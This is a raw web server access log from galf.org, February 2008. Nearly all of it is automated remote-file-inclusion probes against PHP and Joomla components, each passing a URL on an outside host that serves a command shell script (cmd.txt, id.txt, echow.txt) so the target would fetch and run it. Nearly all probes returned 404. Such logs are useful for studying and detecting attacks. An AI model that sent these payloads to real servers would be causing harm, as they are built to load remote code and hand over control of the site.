70.85.98.2 - - [03/Feb/2008:16:03:26 -0800] "GET /logs/access_070709.log/index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:16:03:26 -0800] "GET /index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.85.98.2 - - [03/Feb/2008:16:03:26 -0800] "GET /logs/index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.80.193.49 - - [03/Feb/2008:16:04:13 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=37&ct=result HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312466)" "www.galf.org"
80.199.102.117 - - [03/Feb/2008:16:04:18 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.199.125.235 - - [03/Feb/2008:16:04:23 -0800] "GET /logs/access.log HTTP/1.0" 200 955 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4" "www.galf.org"
70.87.139.98 - - [03/Feb/2008:16:05:02 -0800] "GET /logs/access_070709.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.139.98 - - [03/Feb/2008:16:05:02 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.139.98 - - [03/Feb/2008:16:05:02 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.139.98 - - [03/Feb/2008:16:06:29 -0800] "GET /logs/access_070716.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [03/Feb/2008:16:06:54 -0800] "GET /logs/access_070709.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [03/Feb/2008:16:06:54 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [03/Feb/2008:16:08:05 -0800] "GET /logs/access_070716.log//modules/My_eGallery/public/displayCategory.php?adminpath=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.195.44.86 - - [03/Feb/2008:16:10:56 -0800] "GET /logs/access.log HTTP/1.0" 200 2860 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.208.233 - - [03/Feb/2008:16:11:23 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.233 - - [03/Feb/2008:16:11:24 -0800] "GET /?M=D HTTP/1.0" 200 1032 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
66.7.194.105 - - [03/Feb/2008:16:11:45 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.jackiecollins.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:14:14 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:14:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:17:07 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:17:07 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:17:07 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.199.102.117 - - [03/Feb/2008:16:17:58 -0800] "GET /logs/access_070716.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.199.102.117 - - [03/Feb/2008:16:17:58 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.87.139.98 - - [03/Feb/2008:16:19:03 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.87.139.98 - - [03/Feb/2008:16:19:03 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_pathhttp://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.80.193.30 - - [03/Feb/2008:16:21:23 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=63&ct=result HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312463)" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:21:24 -0800] "GET /logs/index2.php?x=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:21:25 -0800] "GET /index2.php?x=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.98.61 - - [03/Feb/2008:16:26:01 -0800] "GET /index.php?U=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
138.102.82.2 - - [03/Feb/2008:16:28:02 -0800] "GET /index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:28:02 -0800] "GET /logs/access_070709.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:29:07 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:29:07 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:29:07 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:29:26 -0800] "GET /logs/access_070716.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:29:27 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:29:27 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:31:30 -0800] "GET /logs/access_070716.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:31:30 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:31:30 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:31:43 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:31:44 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:32:14 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:32:14 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.236.107 - - [03/Feb/2008:16:33:03 -0800] "GET /db.php?path_local=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
62.193.236.107 - - [03/Feb/2008:16:33:03 -0800] "GET /logs/db.php?path_local=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:33:24 -0800] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.173.115 - - [03/Feb/2008:16:33:49 -0800] "GET /logs/access_070709.log/modules/My_eGallery/index.php?basepath=http://www.beautiful-atlanta.com/admin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:33:58 -0800] "GET /logs/access_070709.log//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:33:59 -0800] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:33:59 -0800] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.236.107 - - [03/Feb/2008:16:34:39 -0800] "GET /db.php?path_local=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "galf.org"
62.193.236.107 - - [03/Feb/2008:16:34:39 -0800] "GET /logs/db.php?path_local=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "galf.org"
80.237.148.55 - - [03/Feb/2008:16:34:51 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
80.237.148.55 - - [03/Feb/2008:16:34:53 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
80.177.187.23 - - [03/Feb/2008:16:37:31 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "galf.org"
80.177.187.23 - - [03/Feb/2008:16:37:31 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://yougirl.kidsoncrack.com/nos.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
80.199.102.117 - - [03/Feb/2008:16:40:34 -0800] "GET /logs/access_070709.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.sawebsos.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.237.148.55 - - [03/Feb/2008:16:40:56 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
80.237.148.55 - - [03/Feb/2008:16:40:57 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://findonline.bravehost.com/safeon.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "galf.org"
72.32.209.240 - - [03/Feb/2008:16:41:29 -0800] "GET /logs/index2.php?x=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:41:29 -0800] "GET /index2.php?x=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:43:26 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:45:59 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:16:45:59 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.221.130.9 - - [03/Feb/2008:16:52:30 -0800] "GET /logs/index2.php?x=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.221.130.9 - - [03/Feb/2008:16:52:30 -0800] "GET /index2.php?x=http://www.blackjackclub.cl/borda3.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.246.8.53 - - [03/Feb/2008:16:53:32 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.colecionismo.com.br//modules/coppermine/albums/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.8.53 - - [03/Feb/2008:16:53:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.colecionismo.com.br//modules/coppermine/albums/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.8.53 - - [03/Feb/2008:16:55:51 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.8.53 - - [03/Feb/2008:16:55:51 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/response.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.184.170 - - [03/Feb/2008:16:56:32 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.fidanquetravel.com/images/PDF/foggian.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:58:00 -0800] "GET /logs/access_070716.log//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:58:00 -0800] "GET //components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.224.20 - - [03/Feb/2008:16:58:00 -0800] "GET /logs//components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://evilscroll.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:16:59:53 -0800] "GET /logs/index2.php?x=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:16:59:53 -0800] "GET /index2.php?x=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.119.219.50 - - [03/Feb/2008:17:00:48 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.30.216.107 - - [03/Feb/2008:17:05:56 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.32.209.240 - - [03/Feb/2008:17:07:04 -0800] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:17:08:15 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
209.35.191.126 - - [03/Feb/2008:17:08:16 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.strider.xpg.com.br/stdr/scan/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
66.119.219.50 - - [03/Feb/2008:17:11:00 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.119.219.50 - - [03/Feb/2008:17:11:00 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
66.119.219.50 - - [03/Feb/2008:17:12:20 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
8.6.221.100 - - [03/Feb/2008:17:12:59 -0800] "GET /index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:13:11 -0800] "GET /logs/index2.php?x=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:13:11 -0800] "GET /logs/index2.php?x=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:13:11 -0800] "GET /index2.php?x=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:13:11 -0800] "GET /index2.php?x=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.44.108 - - [03/Feb/2008:17:16:44 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.79 - - [03/Feb/2008:17:16:45 -0800] "GET /logs/access_071105.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
138.102.82.2 - - [03/Feb/2008:17:18:40 -0800] "GET /logs/access_070709.log/index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
138.102.82.2 - - [03/Feb/2008:17:18:40 -0800] "GET /index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
138.102.82.2 - - [03/Feb/2008:17:18:40 -0800] "GET /logs/index.php?U=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:19:35 -0800] "GET /logs/rss.php?phpraid_dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:19:36 -0800] "GET /logs/rss.php?phpraid_dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:19:36 -0800] "GET /rss.php?phpraid_dir=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.28.233.17 - - [03/Feb/2008:17:19:36 -0800] "GET /rss.php?phpraid_dir=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.169.187.243 - - [03/Feb/2008:17:20:46 -0800] "GET /index.php?u=http://xdenguebds.iespana.es/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.10.135.176 - - [03/Feb/2008:17:21:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [03/Feb/2008:17:21:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [03/Feb/2008:17:21:34 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.135.176 - - [03/Feb/2008:17:21:34 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.crewfuck.kit.net/eval/safealba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.219.244.8 - - [03/Feb/2008:17:23:03 -0800] "GET /logs/access.log/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
213.219.244.8 - - [03/Feb/2008:17:23:04 -0800] "GET /index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
213.219.244.8 - - [03/Feb/2008:17:23:04 -0800] "GET /logs/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
124.217.247.166 - - [03/Feb/2008:17:24:42 -0800] "GET /logs/access_070716.log/index.php?go=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [03/Feb/2008:17:24:42 -0800] "GET /index.php?go=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [03/Feb/2008:17:24:43 -0800] "GET /logs/index.php?go=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.28 - - [03/Feb/2008:17:27:49 -0800] "GET /logs/access.log/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.111.176.28 - - [03/Feb/2008:17:27:50 -0800] "GET /index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
89.111.176.28 - - [03/Feb/2008:17:27:50 -0800] "GET /logs/index.php3?p=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.32.209.240 - - [03/Feb/2008:17:29:53 -0800] "GET /logs/access_070709.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://bagolster.com/tool/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.89.224.76 - - [03/Feb/2008:17:31:21 -0800] "GET /logs/access_080128.log HTTP/1.0" 200 6477199 "-" "Wget/1.10.2" "galf.org"
124.217.247.166 - - [03/Feb/2008:17:35:35 -0800] "GET /logs/access_070716.log/index.php?go=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [03/Feb/2008:17:35:36 -0800] "GET /index.php?go=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [03/Feb/2008:17:35:36 -0800] "GET /logs/index.php?go=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.219.244.8 - - [03/Feb/2008:17:36:50 -0800] "GET /logs/access.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
213.219.244.8 - - [03/Feb/2008:17:36:51 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
213.219.244.8 - - [03/Feb/2008:17:36:51 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
